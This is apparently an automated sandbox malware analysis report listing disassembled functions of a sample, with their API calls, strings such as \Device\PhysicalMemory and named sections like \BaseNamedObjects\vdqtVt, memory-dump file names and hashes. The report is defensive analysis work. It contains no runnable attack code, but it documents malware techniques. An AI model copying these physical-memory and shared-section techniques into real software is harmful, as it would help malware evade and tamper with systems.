Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0047940B
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 0047942A
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00479454
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00479461
UnmapViewOfFile.KERNEL32(?), ref: 00479479

Strings

\Device\PhysicalMemory, xrefs: 004793A1

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: \Device\PhysicalMemory
API String ID: 2985292042-2007344781
Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction ID: c9ed1770a51eeceb4cbc9ac69c50ce46b3031ef87915e6fca9e8c17578926268
Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction Fuzzy Hash: 92819B71500208FFEB24CF14CC89AAA37ADEF44714F604659ED199B291D3F4AF46CBA8

Function 004793C6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0047940B
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 0047942A
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00479454
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00479461
UnmapViewOfFile.KERNEL32(?), ref: 00479479

Strings

ysic, xrefs: 00479411, 00479427

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: ysic
API String ID: 2985292042-20973071
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: a4b267b066f08e2ef8df2b8ac50eb569a23c34ce5c16ab3af1c0546caa93a8a9
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: AF116D70140608BBEB20CF14CC59FEA367DEF84704F108619EA199A2A0E7F46F188A59

Function 7FE34112 Relevance: 8.5, Strings: 6, Instructions: 968COMMON

Download Yara Rule

Strings

@, xrefs: 7FE3459F
(, xrefs: 7FE34E2B
&, xrefs: 7FE34A98
&, xrefs: 7FE34A9E
f, xrefs: 7FE341B9
!, xrefs: 7FE341F1

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID:
String ID: !$&$&$($@$f
API String ID: 0-836565088
Opcode ID: a548e724a74dc9f11ca3a86e122be3e75a7467703da748c30130107ed05d8512
Instruction ID: 163b70a94544a6a33ebd8871784e0f368fa93584f3282bf18d9836246f014e62
Opcode Fuzzy Hash: a548e724a74dc9f11ca3a86e122be3e75a7467703da748c30130107ed05d8512
Instruction Fuzzy Hash: 4E821431D08309EFDB26CF28C849B997BBAEF41318FA55219DC5A8F185D3B4AB51CB05

Function 7FE32425 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\rnxtVt), ref: 7FE32431
lstrlenW.KERNEL32(?), ref: 7FE32438
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FE3248D

Strings

\BaseNamedObjects\rnxtVt, xrefs: 7FE3242F

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\rnxtVt
API String ID: 2597515329-2100028039
Opcode ID: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction ID: 36e2f0a27fad33023740782982cd1b2969f7fc0a37d941ebf6b0748064d4bf92
Opcode Fuzzy Hash: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction Fuzzy Hash: 9F0181B0790344BAF7305B29CC8BF5A3929DF81B51F948154F604AE1C4D5B99A0487AA

Function 006F24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\vdqtVt), ref: 006F24BA
lstrlenW.KERNEL32(?), ref: 006F24C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 006F2516

Strings

\BaseNamedObjects\vdqtVt, xrefs: 006F24B8

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\vdqtVt
API String ID: 2597515329-3506632634
Opcode ID: a0e7931b6ec9b4ea826d6bb84c5d272d7e990a2cff268db9e9c3771cc379ab6c
Instruction ID: bb58588ea9e22815e80f7c30a5c0d3f2203103d15da1ba5a7a5498ab68acfdd2
Opcode Fuzzy Hash: a0e7931b6ec9b4ea826d6bb84c5d272d7e990a2cff268db9e9c3771cc379ab6c
Instruction Fuzzy Hash: 1A0181B0781344BAF7309B29CC4BF5B7929DFC1B50F508558F708AE1C5DAB89A0483A9

Function 00477130 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 350libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00477123,00476757,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00477130

Part of subcall function 00477157: GetProcAddress.KERNEL32(00000000,00477141), ref: 00477158

Strings

\vdqtVt, xrefs: 00477187

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: \vdqtVt
API String ID: 2574300362-4079102830
Opcode ID: d22ad19c5d20953731eb26dff950cba296a473678d0b8728d05c867e6114a31d
Instruction ID: 6b9c97f5df75992c63d6971bb8dd5519a058f3ab7a0e0083c6f2881134c52dfc
Opcode Fuzzy Hash: d22ad19c5d20953731eb26dff950cba296a473678d0b8728d05c867e6114a31d
Instruction Fuzzy Hash: 99A1732285C2819BC731AA708C894EF7F54EA127507C8C6DFECAC4B743D6998C06D79D

Function 0047984F Relevance: 4.6, APIs: 3, Instructions: 127sleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0047D545), ref: 00479860
Sleep.KERNEL32(0000EA60), ref: 004798D2
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00479982

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep$SystemTime
String ID:
API String ID: 3773743504-0
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: 28d525e624ac25824b3bb18be67b2a8477d8f0781c310dde4727481d83f232a3
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: D341D271644249BAEB305F258C4EBDA7B6EEF85310F04842AF90DDE2C1D7F89F418629

Function 004784F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 0047851F

Strings

\BaseNamedObjects\vdqtVt, xrefs: 0047850C

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\vdqtVt
API String ID: 1950954290-3506632634
Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278

Function 7FE324A6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 7FE324D5

Strings

\BaseNamedObjects\rnxtVt, xrefs: 7FE324C2

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\rnxtVt
API String ID: 1950954290-2100028039
Opcode ID: 01bc40aaccc0e12f94ebcffc641123895db33c2b7787041d8d9fd48dce060fde
Instruction ID: 3af93ba349bfc42ef742b5b28717abad19c90c039107910871d63db4ec892b88
Opcode Fuzzy Hash: 01bc40aaccc0e12f94ebcffc641123895db33c2b7787041d8d9fd48dce060fde
